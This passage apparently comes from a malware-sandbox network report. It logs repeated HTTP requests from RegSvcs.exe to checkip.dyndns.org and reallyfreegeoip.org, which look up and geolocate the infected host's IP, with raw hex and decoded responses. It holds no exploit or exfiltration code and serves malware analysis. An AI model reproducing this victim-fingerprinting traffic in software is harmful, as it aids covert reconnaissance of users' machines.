Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:57:30.004739046 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:57:30.004851103 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:57:30.004977942 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
8          | 192.168.2.10 | 49871       | 132.226.247.73  | 80               | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:34.430164099 CET | 151               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:35.132913113 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:57:35.138232946 CET | 127               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 14, 2025 16:57:35.347882986 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:57:36.085391998 CET | 127               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 14, 2025 16:57:36.296035051 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:36 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
9          | 192.168.2.10 | 49889       | 132.226.247.73  | 80               | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:36.909997940 CET | 127               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 14, 2025 16:57:37.610177994 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
10         | 192.168.2.10 | 49901       | 132.226.247.73  | 80               | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:38.244467020 CET | 127               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 14, 2025 16:57:38.972536087 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:38 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
11         | 192.168.2.10 | 49911       | 132.226.247.73  | 80               | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:39.630228043 CET | 151               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:40.353435993 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:40 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
12         | 192.168.2.10 | 49921       | 132.226.247.73  | 80               | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:41.005021095 CET | 151               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:41.699500084 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:41 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 49931 | 132.226.247.73 | 80 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:42.300997972 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:42.983154058 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:42 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.10 | 49941 | 132.226.247.73 | 80 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:43.625154972 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:44.302015066 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:44 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.10 | 49952 | 132.226.247.73 | 80 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:44.920208931 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:45.620203018 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:45 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49760 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:18 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:19 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:19 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185028
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TqQlpS9nXDReVO%2Fw9Z7zANBqVjiEwlsBIeXlzqseN8d0p3U34gQjA1CTgl85OFC64Cm5%2FWYkd7R6%2BOKfQnuaIJRzL5RoW21iYD%2B5roNZT9vJ0mRo8cCd7dZaOcHC3fw5rx2mqrsb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed231f9b872a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1952&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1460730&cwnd=212&unsent_bytes=0&cid=98dfac1f758e113d&ts=188&x=0"
2025-01-14 15:57:19 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49766 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:19 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-14 15:57:20 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:19 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185029
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVtNks4%2FYETsDxCMU62YyOrl%2FGtbOj0uIDZbk2670obzyQAvE8ueOk%2FjqsGYh50HOPlnEJV7s7nNSAxxkIlOeDzUxab1CPMRtRYCwpVMDH1wfvNVW3hISxLb0KAgUbUyv%2FZrEwVl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed237bfeec32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=3401&min_rtt=3340&rtt_var=1374&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=762601&cwnd=178&unsent_bytes=0&cid=d4d7150e3cb7022b&ts=171&x=0"
2025-01-14 15:57:20 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49778 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:21 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:21 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:21 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185030
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWXK2mn9dTovHuqoUPtoV1MlKVpKP1%2FEwZxGZIpnG%2FV9VWFuDcddGziHt6ha3NackZcnLf5NWqJzm0f5gXRATDBKRUiqNkt1teDfN2CeodzUMyogK4fx6If6QAEgXbqW3%2BvgkZF9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed23fe937c32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=3467&min_rtt=1570&rtt_var=1878&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1859872&cwnd=178&unsent_bytes=0&cid=1569bd5d6ffc5452&ts=152&x=0"
2025-01-14 15:57:21 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49785 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:22 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-14 15:57:22 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:22 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185031
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuzyoBsjEeTljgu9APgJAjP%2F%2B3v8080LxdPRiOpPAC6YfGZ3S3mW4v0akjtvOGHZC4Ueeb2Wz6%2F9RX57bbBA6wFGj%2FmzrMcU82w1k9RLHu6siM%2B0V%2FqK7b61fhKN7p13iDxgaHFV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed248192a1a48-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1949&rtt_var=737&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1477732&cwnd=157&unsent_bytes=0&cid=da8fd159a56f82c8&ts=166&x=0"
2025-01-14 15:57:22 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49796 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:23 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:24 UTC | 865 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:23 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185033
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wY2pI2HAjIPo13SJ06GKP5uGcYe4y8%2B1fTy3vEHH2nsDbTUpeOg4oZz%2Fk0b9u%2FNoPNgWHwqgKWNpo7WRCkw%2FZGTfWgqsD471TeXP%2FKoC68g13PYCyfx%2FH0myZFz%2Ft0J0l0l%2BeA1D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed250ba9d1a48-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1976&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1445544&cwnd=157&unsent_bytes=0&cid=b2e1b565dc8cbef1&ts=160&x=0"
2025-01-14 15:57:24 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49808 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:25 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-14 15:57:25 UTC | 853 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:25 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 2185034
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WV26CKA4j5MS6fpowLVPsHyYxOazsShF34iYIFqEOsZcUlxrDm9lP8j13yqLUv3JNmJO4Vy1fC%2FC5GK6ZfZuI8ofHcqG%2Bio8cz50E1BtasqrSzgfc9QCeZZZ8Cj43NCGP0rU8ggE"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901ed25aaa3672a4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2057&rtt_var=800&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1343764&cwnd=212&unsent_bytes=0&cid=d1db2203f68f680d&ts=168&x=0"
2025-01-14 15:57:25 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49822 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:26 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-14 15:57:26 UTC | 855 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:26 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 2185035
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRBiK7pdgv%2B08rRMC8Em1jGCKpPbUpf73UuuLKqL73F%2BGXZgmUud14FEbtduQkcs9Jn6uGbv9m9Lk01wrFrUaE0nBlnHodR7uy1gZHUNRkBg48sFGZf9oEgAw8cO6ctmJ%2Fkz7GJF"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901ed262cccf72a4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1991&rtt_var=762&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1422308&cwnd=212&unsent_bytes=0&cid=eeac3f9e73b4007c&ts=155&x=0"
2025-01-14 15:57:26 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
